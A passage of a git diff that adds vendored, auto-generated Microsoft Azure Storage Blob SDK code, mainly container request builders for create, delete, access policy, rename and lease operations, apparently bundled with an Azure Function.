url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + list_type=list_type, + timeout=timeout, + lease_id=_lease_id, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.get_block_list.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('BlockList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_block_list.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_container_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_container_operations.py new file mode 100644 index 0000000..1031c20 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_container_operations.py @@ -0,0 +1,2740 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_create_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + access = kwargs.pop('access', None) # type: Optional[Union[str, "_models.PublicAccessType"]] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + default_encryption_scope = kwargs.pop('default_encryption_scope', None) # type: Optional[str] + prevent_encryption_scope_override = kwargs.pop('prevent_encryption_scope_override', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if access is not None: + _header_parameters['x-ms-blob-public-access'] = _SERIALIZER.header("access", access, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if default_encryption_scope is not None: + _header_parameters['x-ms-default-encryption-scope'] = _SERIALIZER.header("default_encryption_scope", default_encryption_scope, 'str') + if prevent_encryption_scope_override is not None: + _header_parameters['x-ms-deny-encryption-scope-override'] = _SERIALIZER.header("prevent_encryption_scope_override", prevent_encryption_scope_override, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_delete_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="DELETE", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_metadata_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "metadata") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_access_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_access_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + access = kwargs.pop('access', None) # type: Optional[Union[str, "_models.PublicAccessType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if access is not None: + _header_parameters['x-ms-blob-public-access'] = _SERIALIZER.header("access", access, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_restore_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "undelete") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + deleted_container_name = kwargs.pop('deleted_container_name', None) # type: Optional[str] + deleted_container_version = kwargs.pop('deleted_container_version', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if deleted_container_name is not None: + _header_parameters['x-ms-deleted-container-name'] = _SERIALIZER.header("deleted_container_name", deleted_container_name, 'str') + if deleted_container_version is not None: + _header_parameters['x-ms-deleted-container-version'] = _SERIALIZER.header("deleted_container_version", deleted_container_version, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_rename_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "rename") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + source_container_name = kwargs.pop('source_container_name') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + source_lease_id = kwargs.pop('source_lease_id', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['x-ms-source-container-name'] = _SERIALIZER.header("source_container_name", source_container_name, 'str') + if source_lease_id is not None: + _header_parameters['x-ms-source-lease-id'] = _SERIALIZER.header("source_lease_id", source_lease_id, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_submit_batch_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "batch") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['Content-Type'] = _SERIALIZER.header("multipart_content_type", multipart_content_type, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="POST", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_filter_blobs_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "blobs") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + where = kwargs.pop('where', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if where is not None: + _query_parameters['where'] = _SERIALIZER.query("where", where, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_acquire_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "acquire") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + duration = kwargs.pop('duration', None) # type: Optional[int] + proposed_lease_id = kwargs.pop('proposed_lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if duration is not None: + _header_parameters['x-ms-lease-duration'] = _SERIALIZER.header("duration", duration, 'int') + if proposed_lease_id is not None: + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_release_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "release") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_renew_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "renew") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_break_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "break") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + break_period = kwargs.pop('break_period', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if break_period is not None: + _header_parameters['x-ms-lease-break-period'] = _SERIALIZER.header("break_period", break_period, 'int') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_change_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "change") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + 